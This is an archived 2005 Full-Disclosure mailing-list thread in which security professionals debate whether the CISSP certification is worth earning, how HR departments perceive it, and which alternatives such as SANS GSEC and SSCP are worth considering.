Hello Vladamir, To answer your question, yes the CISSP is worth it. However it is only worth it due to the publics misconception of what is is. The CISSP certification basically shows that you have a base understanding of the primary concepts across what are widely regarded as all the major areas if IT security knowledge (known as the Common Body of Knowledge or CBK). This is a good thing if you are, or aspire to be, in a management position. Unfortunately the common perception of the CISSP by most non-IT security people (which includes HR staff) is that someone who is a CISSP is capable and competent in all areas of IT security. Add to that the belief it is the best (or only) security certification they are aware of and it becomes "the" security certification in thier eyes. I have seen many job descriptions in my time and in the last few years it is rare to find one that does not either require or desire the CISSP. As for other certifications, the SANS certs are quite good although, I believe, they are about to get devalued by the removal of the practical requirement. I would recommend getting the CISSP, maybe the GSEC (SANS security essentials cert) and then focusing on certs for products/systems within the area you will be working in. But remember, the cert is just the starting point and the resume's foot in the door. You need to study and get as much hands on as you can to actually learn your chosen trade. Good Luck, Adeel ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
To reiterate, CISSP is more for management...If you want a more thorough understanding of secure networks, platforms -- Go for the SSCP! David Chastain, CISSP On Tuesday, March 22, 2005, at 08:06AM, Vladamir <[EMAIL PROTECTED]> wrote: >Wow, thanks a lot. I'll pick the book back up, I have read about a lot >of "clueless" CISSPs, this one gentlemen I spoke with (Who is a CISSP) >said that OpenBSD is easily remotely exploitable, it made me question >the integrity of this gentleman and the process in which one becomes a >CISSP (Assuming it has to do with through understanding of secure >networks, platforms, etc) > >What are some of the other Computer/Network security exams that are good >for showing a through understanding of the concepts? > >Wade Woolwine wrote: >> Agreed with Robert on this one. It's pretty much a sure-fire way to get >> your foot in the door...esp. if you're dealing with Gov. contractors or >> the Gov. itself. Once you have the job, if you don't have the skills, you >> won't last long. I figure 90% of the job battle is actually getting >> through the HR folks who look over resumes checking off boxes in a >> checklist to see if you qualify - certs/education and of course experience >> will fill all those check lists. >> >> wade >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >___ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
Exactly, although the test was much easier than everyone made it out to be. Or I over studied not sure which is true. I have a few years in the sec field under my belt and decided to get it just to have it. Kind of, I have the skills and here is the proof, for management. I think it is a worthy investment especially if your looking for new job with the current market in the US anyway. On Tuesday 22 March 2005 09:41, Forbes, Robert R wrote: > Many companies that know little or nothing about security, which means a > lot of them, use the CISSP as the "benchmark" for determining if they > will even interview you for a position so from that standpoint it is > good to have. The test is good for showing you have a good overall grasp > from the security concepts that you would want a security professional > to have but as always I wouldn't rely on the fact that someone was > certified to decide if I was going to hire them. > > > My .02 > > Robert > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Vladamir > Sent: Tuesday, March 22, 2005 10:36 AM > Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com > Subject: [Full-disclosure] CISSP Test > > I have heard conflicting views of the CISSP exam, is it worth it? > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- "Unix IS user-friendly. It's just picky about who its friends are." _,.-:*"``'*:-.,_,.-:*"``'*:-.,_,.-:*"``'*:-.,_,.-:*"``'*:-.,_,.-:*"``'*:-.,_ Daniel Fairchild CISSP - Chief Security Officer | [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
Just as with any other certs (or SATs or MCATS, etc, etc, etc) there are people who are really good at cramming the information from the book and have mastered the concept of the Multiple Choice questions. This does by no means represent a good understanding of the subject matter...which would be why these people don't last long in the buizz. Again, certs are just the foot in the door...you have to know your stuff if you're going to be successful in this field. As far as other certs...I think that SANS (www.sans.org) has some well respected certs...but I don't think that over-certing yourself is really worth the time/money. CISSP covers all of the domains and shows that you have working knowledge of all (at least that's what it's supposed to do). Just a word on the CISSP, you have to have worked in the field for 5 years (3 years with degree) in order to get it...otherwise you'll get the ISC2 associates cert...same exam and after the x years period, you will automatically be grandfathered in to CISSP. wade ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP Test
Wow, thanks a lot. I'll pick the book back up, I have read about a lot of "clueless" CISSPs, this one gentlemen I spoke with (Who is a CISSP) said that OpenBSD is easily remotely exploitable, it made me question the integrity of this gentleman and the process in which one becomes a CISSP (Assuming it has to do with through understanding of secure networks, platforms, etc) What are some of the other Computer/Network security exams that are good for showing a through understanding of the concepts? Wade Woolwine wrote: Agreed with Robert on this one. It's pretty much a sure-fire way to get your foot in the door...esp. if you're dealing with Gov. contractors or the Gov. itself. Once you have the job, if you don't have the skills, you won't last long. I figure 90% of the job battle is actually getting through the HR folks who look over resumes checking off boxes in a checklist to see if you qualify - certs/education and of course experience will fill all those check lists. wade ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] CISSP Test
Agreed with Robert on this one. It's pretty much a sure-fire way to get your foot in the door...esp. if you're dealing with Gov. contractors or the Gov. itself. Once you have the job, if you don't have the skills, you won't last long. I figure 90% of the job battle is actually getting through the HR folks who look over resumes checking off boxes in a checklist to see if you qualify - certs/education and of course experience will fill all those check lists. wade ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] CISSP Test
Many companies that know little or nothing about security, which means a lot of them, use the CISSP as the "benchmark" for determining if they will even interview you for a position so from that standpoint it is good to have. The test is good for showing you have a good overall grasp from the security concepts that you would want a security professional to have but as always I wouldn't rely on the fact that someone was certified to decide if I was going to hire them. My .02 Robert -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Vladamir Sent: Tuesday, March 22, 2005 10:36 AM Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Subject: [Full-disclosure] CISSP Test I have heard conflicting views of the CISSP exam, is it worth it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CISSP Test
I have heard conflicting views of the CISSP exam, is it worth it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/